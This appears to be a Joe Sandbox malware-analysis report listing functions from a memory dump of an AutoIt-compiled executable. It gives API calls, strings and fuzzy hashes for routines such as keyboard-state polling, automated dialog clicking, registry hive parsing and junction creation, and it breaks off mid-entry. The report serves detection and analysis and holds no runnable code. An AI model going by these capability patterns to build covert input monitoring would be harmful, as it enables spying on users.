                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                • String ID: (
                                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                                • Opcode ID: 934503d18ddc9bee418865e32ce53aaf5a0aad08d0116a1df98f7e2290bd9263
                                                                                                                                • Instruction ID: 1861b7aee85c2917aff9d9e6fb81e240cfd1aa98b64fd9ed352df9d327816788
                                                                                                                                • Opcode Fuzzy Hash: 934503d18ddc9bee418865e32ce53aaf5a0aad08d0116a1df98f7e2290bd9263
                                                                                                                                • Instruction Fuzzy Hash: 5F513876900309AFDB15CFA8CC85AAEBBB9EF48310F14841EF95AA7210D735A8419F50
                                                                                                                                Function 00F7E541 Relevance: 21.1, APIs: 14, Instructions: 129commemoryfileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00F7E57B
                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00F7E586
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00F7E593
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00F7E59C
                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00F7E5AB
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00F7E5B4
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00F7E5BB
                                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F7E5CC
                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F9D9BC,?), ref: 00F7E5E5
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00F7E5F5
                                                                                                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 00F7E619
                                                                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00F7E644
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00F7E66C
                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F7E682
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$CloseFileHandleObject$AllocCopyCreateDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1759995340-0
                                                                                                                                • Opcode ID: 39951b138cfd1b8911b6d0f6a4119202f387df0cf241c6600f45c7585ed7b498
                                                                                                                                • Instruction ID: be40cc126a4ccf5979e7da25a19a65c40e9a455cfe47bd41369764ba5ef352fe
                                                                                                                                • Opcode Fuzzy Hash: 39951b138cfd1b8911b6d0f6a4119202f387df0cf241c6600f45c7585ed7b498
                                                                                                                                • Instruction Fuzzy Hash: 25414E75600208FFDB119F65DC48EAEBBB9EF89725F20805AF909D7260D7319D41EB21
                                                                                                                                Function 00F5D950 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 100COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00F5D96C
                                                                                                                                • __swprintf.LIBCMT ref: 00F5D98E
                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F5D9CB
                                                                                                                                • _memset.LIBCMT ref: 00F5DA0F
                                                                                                                                • _wcsncpy.LIBCMT ref: 00F5DA4B
                                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00F5DA80
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00F5DA8B
                                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00F5DA94
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00F5DA9E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseDirectoryHandle$ControlCreateDeviceFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                • String ID: :$\$\??\%s
                                                                                                                                • API String ID: 1122224643-3457252023
                                                                                                                                • Opcode ID: 389e9c7887776cfe5569cd585e42ef766a995700616356de35becda7896d01c7
                                                                                                                                • Instruction ID: ac7652d03cc7bf2aa53add7d0b3832ec0ee303de1ab91edcea1325960d2c6380
                                                                                                                                • Opcode Fuzzy Hash: 389e9c7887776cfe5569cd585e42ef766a995700616356de35becda7896d01c7
                                                                                                                                • Instruction Fuzzy Hash: A231B67290120CAADB20DFA4DC49FDB77BCFF84710F1081A6F515D2061E774DA859BA1
                                                                                                                                Function 00F60B20 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 229COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __wsplitpath.LIBCMT ref: 00F60C93
                                                                                                                                • _wcscat.LIBCMT ref: 00F60CAB
                                                                                                                                • _wcscat.LIBCMT ref: 00F60CBD
                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00F60CD2
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00F60CE6
                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00F60CFE
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00F60D2A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentDirectory$_wcscat$AttributesFile__wsplitpath
                                                                                                                                • String ID: *.*
                                                                                                                                • API String ID: 4196653570-438819550
                                                                                                                                • Opcode ID: 977d9ba6be2832709838dfd753c2f877369a39641231af023b5c4cb824f7d983
                                                                                                                                • Instruction ID: f0fbe8fc7661cd7a7045f8d3c7ee0847855110e7c91ca27c31fea3e1a2f04367
                                                                                                                                • Opcode Fuzzy Hash: 977d9ba6be2832709838dfd753c2f877369a39641231af023b5c4cb824f7d983
                                                                                                                                • Instruction Fuzzy Hash: 7F8196729043059FC764DF64C845AABB7E4BF89314F24892AF885C7251EF34DD84EB52
                                                                                                                                Function 00F5D520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF), ref: 00F5D567
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                • LoadStringW.USER32(?,?,00000FFF,?), ref: 00F5D589
                                                                                                                                • __swprintf.LIBCMT ref: 00F5D5DC
                                                                                                                                • _wprintf.LIBCMT ref: 00F5D68D
                                                                                                                                • _wprintf.LIBCMT ref: 00F5D6AB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                • API String ID: 2116804098-2391861430
                                                                                                                                • Opcode ID: 38f12f23af273b1e213f7d76071d6721032dabf24d6d991e7744e015f7084221
                                                                                                                                • Instruction ID: 18c089c9268af68b034b507b3de15ccc68369d5628370224fa003f6fc8cb1add
                                                                                                                                • Opcode Fuzzy Hash: 38f12f23af273b1e213f7d76071d6721032dabf24d6d991e7744e015f7084221
                                                                                                                                • Instruction Fuzzy Hash: DA51A572901109BACB15FBA0DD82EEEB779AF14701F104066F605B2061EB795F98FBA1
                                                                                                                                Function 00F5D338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00F5D37F
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F5D3A0
                                                                                                                                • __swprintf.LIBCMT ref: 00F5D3F3
                                                                                                                                • _wprintf.LIBCMT ref: 00F5D499
                                                                                                                                • _wprintf.LIBCMT ref: 00F5D4B7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                • API String ID: 2116804098-3420473620
                                                                                                                                • Opcode ID: 40ab98979fb7905e2aa695d7c9ddb5cc6ad6e89634b6d519275f8e430b18a71d
                                                                                                                                • Instruction ID: 5b4a5126d51c38f32282b0367731ff3f5399cfcc6eee2f2401598df37b62f792
                                                                                                                                • Opcode Fuzzy Hash: 40ab98979fb7905e2aa695d7c9ddb5cc6ad6e89634b6d519275f8e430b18a71d
                                                                                                                                • Instruction Fuzzy Hash: 9251B772901109BACB15FBE0CD46EEEB779AF14701F104066F60572061EB796F98FBA1
                                                                                                                                Function 00F73AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F72AA6,?,?), ref: 00F73B0E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharUpper
                                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                • API String ID: 3964851224-909552448
                                                                                                                                • Opcode ID: c607f15c5e48f2eb896a40929ded7f7c6ded1f3652dcddafc936baafad39bf76
                                                                                                                                • Instruction ID: dd492f1423552d32075f70b8ff9426e15a2f144408ded955a848cd4b48b96840
                                                                                                                                • Opcode Fuzzy Hash: c607f15c5e48f2eb896a40929ded7f7c6ded1f3652dcddafc936baafad39bf76
                                                                                                                                • Instruction Fuzzy Hash: 1041A23412024A9BDF05EF14ED51BEA33A2BF15350F188839EC655B256DB34AE09FB52
                                                                                                                                Function 00F583D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F17E53: _memmove.LIBCMT ref: 00F17EB9
                                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F5843F
                                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F58455
                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F58466
                                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F58478
                                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F58489
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: SendString$_memmove
                                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                • API String ID: 2279737902-1007645807
                                                                                                                                • Opcode ID: 9a19ce802c77c7b4a2bac582f80aaba8125edc3595017f60aa377e9cbc78e6a4
                                                                                                                                • Instruction ID: ea23c9c6af1de03b2fba5015f6ab5f9d408dd84d820c3250f7ba7022446a9b88
                                                                                                                                • Opcode Fuzzy Hash: 9a19ce802c77c7b4a2bac582f80aaba8125edc3595017f60aa377e9cbc78e6a4
                                                                                                                                • Instruction Fuzzy Hash: F211C461A4025E79D714F7A1CC4BEFF7A7CEFD1B80F44442D7811A20C0DEA08A49E9B1
                                                                                                                                Function 00F58097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • timeGetTime.WINMM ref: 00F5809C
                                                                                                                                  • Part of subcall function 00F2E3A5: timeGetTime.WINMM(?,75C0B400,00F86163), ref: 00F2E3A9
                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00F580C8
                                                                                                                                • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00F580EC
                                                                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00F5810E
                                                                                                                                • SetActiveWindow.USER32 ref: 00F5812D
                                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F5813B
                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F5815A
                                                                                                                                • Sleep.KERNEL32(000000FA), ref: 00F58165
                                                                                                                                • IsWindow.USER32 ref: 00F58171
                                                                                                                                • EndDialog.USER32(00000000), ref: 00F58182
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                • String ID: BUTTON
                                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                                • Opcode ID: b777ad50193d98ab8c258d8c357714531eb23088632b51d39d4a1463f13c1e9f
                                                                                                                                • Instruction ID: a8b58f866586f1e7401b52efbec63c7d5744712b9d3f165f9a16c7d7d1871229
                                                                                                                                • Opcode Fuzzy Hash: b777ad50193d98ab8c258d8c357714531eb23088632b51d39d4a1463f13c1e9f
                                                                                                                                • Instruction Fuzzy Hash: 1021957120160DAFE7129B31EC89B263B2BF7053DAF150116FB11A31A1CF764D0ABB12
                                                                                                                                Function 00F532B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F83C64,00000010,00000000,Bad directive syntax error,00FADBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00F532D1
                                                                                                                                • LoadStringW.USER32(00000000,?,00F83C64,00000010), ref: 00F532D8
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                • _wprintf.LIBCMT ref: 00F53309
                                                                                                                                • __swprintf.LIBCMT ref: 00F5332B
                                                                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F53395
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                • API String ID: 1506413516-4153970271
                                                                                                                                • Opcode ID: 62cb06b179437aad85d3fafbe6c55701e7accdf69402b74901c5c8bfdaf50ba7
                                                                                                                                • Instruction ID: 82c87e0ea7ddad2c333523acf626110732f5e41ff41c03e9e98e6d0da0fc3c67
                                                                                                                                • Opcode Fuzzy Hash: 62cb06b179437aad85d3fafbe6c55701e7accdf69402b74901c5c8bfdaf50ba7
                                                                                                                                • Instruction Fuzzy Hash: 3421713184021EBBDF01AF90CC46EEE7B35BF14741F004456B605A10A1DA799A98FB91
                                                                                                                                Function 00F608D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3566271842-0
                                                                                                                                • Opcode ID: 2885fd0e04444f77c9debc68827541cc2c76b88a661e07aa4745a6ab30281518
                                                                                                                                • Instruction ID: 2d28dc49297fcdf9d727b0486f81ba0baface6e7fcfc9cc741faa0940c5a4547
                                                                                                                                • Opcode Fuzzy Hash: 2885fd0e04444f77c9debc68827541cc2c76b88a661e07aa4745a6ab30281518
                                                                                                                                • Instruction Fuzzy Hash: 5B713B75A00219AFDB10DFA4C884ADEB7B9FF49350F148096E909AB251DB34EE40DF90
                                                                                                                                Function 00F5388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetKeyboardState.USER32(?), ref: 00F53908
                                                                                                                                • SetKeyboardState.USER32(?), ref: 00F53973
                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00F53993
                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00F539AA
                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00F539D9
                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00F539EA
                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00F53A16
                                                                                                                                • GetKeyState.USER32(00000011), ref: 00F53A24
                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00F53A4D
                                                                                                                                • GetKeyState.USER32(00000012), ref: 00F53A5B
                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00F53A84
                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00F53A92
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
